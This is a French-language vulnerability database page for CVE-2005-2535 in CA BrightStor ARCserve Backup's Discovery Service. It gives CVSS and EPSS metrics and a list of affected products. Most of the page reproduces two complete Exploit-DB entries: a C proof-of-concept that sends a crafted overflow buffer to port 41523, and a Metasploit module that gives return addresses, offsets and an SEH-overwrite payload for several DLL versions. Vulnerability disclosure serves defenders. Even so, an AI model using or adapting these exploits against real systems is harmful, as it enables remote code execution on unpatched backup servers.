Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 815
Date de publication : 2005-02-11 23h00 +00:00
Auteur : cybertronic
EDB Vérifié : Yes
/*
* BrightStor ARCserve Backup buffer overflow PoC
* cybertronic@gmx.net
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
#define PORT 41523
void
start ( int s )
{
char buffer[4096];
bzero ( &buffer, 4096 );
memset ( buffer, 0x41, 50 );
buffer[0] = 0x9b;
buffer[1] = 0x53; //S
buffer[2] = 0x45; //E
buffer[3] = 0x52; //R
buffer[4] = 0x56; //V
buffer[5] = 0x49; //I
buffer[6] = 0x43; //C
buffer[7] = 0x45; //E
buffer[8] = 0x50; //P
buffer[9] = 0x43; //C
buffer[17] = 0x18;
buffer[21] = 0xc0;
buffer[22] = 0xa8;
buffer[23] = 0x02;
buffer[24] = 0x67;
buffer[25] = 0x53; //S
buffer[26] = 0x45; //E
buffer[27] = 0x52; //R
buffer[28] = 0x56; //V
buffer[29] = 0x49; //I
buffer[30] = 0x43; //C
buffer[31] = 0x45; //E
buffer[32] = 0x50; //P
buffer[33] = 0x43; //C
buffer[41] = 0x01;
buffer[43] = 0x0c;
buffer[44] = 0x6c;
buffer[45] = 0x93;
buffer[46] = 0xce;
buffer[47] = 0x18;
buffer[48] = 0x18;
//ebp
buffer[49] = 0xbe;
buffer[50] = 0xba;
buffer[51] = 0xad;
buffer[52] = 0xde;
//eip
buffer[53] = 0xde;
buffer[54] = 0xc0;
buffer[55] = 0xad;
buffer[56] = 0xde;
printf ( "[*] Sending buffer [ %d bytes ]...", strlen ( buffer ) );
if ( write ( s, buffer, strlen ( buffer ) ) <= 0 )
{
printf ( RED "Send failed!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
sleep ( 1 );
}
int
main ( int argc, char *argv[] )
{
int s;
struct hostent *he;
struct sockaddr_in addr;
if ( argc != 2 )
{
fprintf ( stderr,"Usage: %s hostname\n", argv[0] );
exit ( 1 );
}
printf ( "Resolving hostname..." );
if ( ( he = gethostbyname ( argv[1] ) ) == NULL )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( "OK!\n" );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
exit ( 1 );
}
addr.sin_family = AF_INET;
addr.sin_port = htons ( PORT );
addr.sin_addr = *( ( struct in_addr * ) he->h_addr );
printf ( "Connecting to %s...", argv[1] );
if ( connect ( s, ( struct sockaddr * ) &addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( "OK!\n" );
start ( s );
close ( s );
return ( 0 );
}
// milw0rm.com [2005-02-12]
Exploit Database EDB-ID : 16408
Date de publication : 2010-04-29 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: discovery_tcp.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor Discovery Service TCP Overflow',
'Description' => %q{
This module exploits a vulnerability in the CA BrightStor
Discovery Service. This vulnerability occurs when a specific
type of request is sent to the TCP listener on port 41523.
This vulnerability was discovered by cybertronic[at]gmx.net
and affects all known versions of the BrightStor product.
This module is based on the 'cabrightstor_disco' exploit by
Thor Doomen.
},
'Author' => [ 'hdm', 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2005-2535'],
[ 'OSVDB', '13814'],
[ 'BID', '12536'],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html'],
[ 'URL', 'http://milw0rm.com/exploits/1131'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2048,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'cheyprod.dll 9/14/2000', # Build 1220.0 9/14/2000 7.0.1220.0
{
'Platform' => 'win',
'Ret' => 0x23803b20, # pop/pop/ret
'Offset' => 1032,
},
],
[
'cheyprod.dll 12/12/2003',
{
'Platform' => 'win',
'Ret' => 0x23805714, # pop/pop/ret
'Offset' => 1024,
},
],
[
'cheyprod.dll 07/21/2004',
{
'Platform' => 'win',
'Ret' => 0x23805d10, # pop/pop/ret
'Offset' => 1024,
},
],
],
'DisclosureDate' => 'Feb 14 2005',
'DefaultTarget' => 1))
register_options(
[
Opt::RPORT(41523)
], self.class)
end
def check
# The first request should have no reply
csock = Rex::Socket::Tcp.create(
'PeerHost' => datastore['RHOST'],
'PeerPort' => datastore['RPORT'],
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
csock.put('META')
x = csock.get_once(-1, 3)
csock.close
# The second request should be replied with the host name
csock = Rex::Socket::Tcp.create(
'PeerHost' => datastore['RHOST'],
'PeerPort' => datastore['RPORT'],
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
csock.put('hMETA')
y = csock.get_once(-1, 3)
csock.close
if (y and not x)
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
connect
print_status("Trying target #{target.name}...")
buf = rand_text_english(4096)
# Overwriting the return address works well, but the only register
# pointing back to our code is 'esp'. The following stub overwrites
# the SEH frame instead, making things a bit easier.
seh = generate_seh_payload(target.ret)
buf[target['Offset'], seh.length] = seh
# Make sure the return address is invalid to trigger SEH
buf[ 900, 100] = (rand(127)+128).chr * 100
# SERVICEPC is the client host name actually =P (thanks Juliano!)
req = "\x9b" + 'SERVICEPC' + "\x18" + [0x01020304].pack('N') + 'SERVICEPC' + "\x01\x0c\x6c\x93\xce\x18\x18\x41"
req << buf
sock.put(req)
sock.get_once
handler
disconnect
end
end
Products Mentioned
Configuraton 0
Broadcom>>Arcserve_backup_2000 >> Version r16.5
Broadcom>>Brightstor_arcserve_backup >> Version 7.0
Broadcom>>Brightstor_arcserve_backup >> Version 9.0
Broadcom>>Brightstor_arcserve_backup >> Version 9.0
Broadcom>>Brightstor_arcserve_backup >> Version 9.0
Broadcom>>Brightstor_arcserve_backup >> Version 9.0.1
Broadcom>>Brightstor_arcserve_backup >> Version 11.0
Broadcom>>Brightstor_arcserve_backup >> Version 11.1
Broadcom>>Brightstor_arcserve_backup >> Version 11.1
Broadcom>>Brightstor_arcserve_backup >> Version 11.1
Broadcom>>Brightstor_arcserve_backup >> Version 11.1
Broadcom>>Brightstor_arcserve_backup >> Version 11.1
Broadcom>>Brightstor_arcserve_backup >> Version 11.1
Broadcom>>Brightstor_arcserve_backup >> Version 11.1
Broadcom>>Brightstor_arcserve_backup_hp >> Version 11.1
Broadcom>>Brightstor_enterprise_backup >> Version 10
Broadcom>>Brightstor_enterprise_backup >> Version 10.0
Broadcom>>Brightstor_enterprise_backup >> Version 10.0
Broadcom>>Brightstor_enterprise_backup >> Version 10.0
Broadcom>>Brightstor_enterprise_backup >> Version 10.0
Broadcom>>Brightstor_enterprise_backup >> Version 10.5
Broadcom>>Brightstor_enterprise_backup >> Version 10.5
Broadcom>>Brightstor_enterprise_backup >> Version 10.5
Broadcom>>Brightstor_enterprise_backup >> Version 10.5
Broadcom>>Brightstor_enterprise_backup >> Version 10.5
Broadcom>>Brightstor_enterprise_backup >> Version 10.5
Références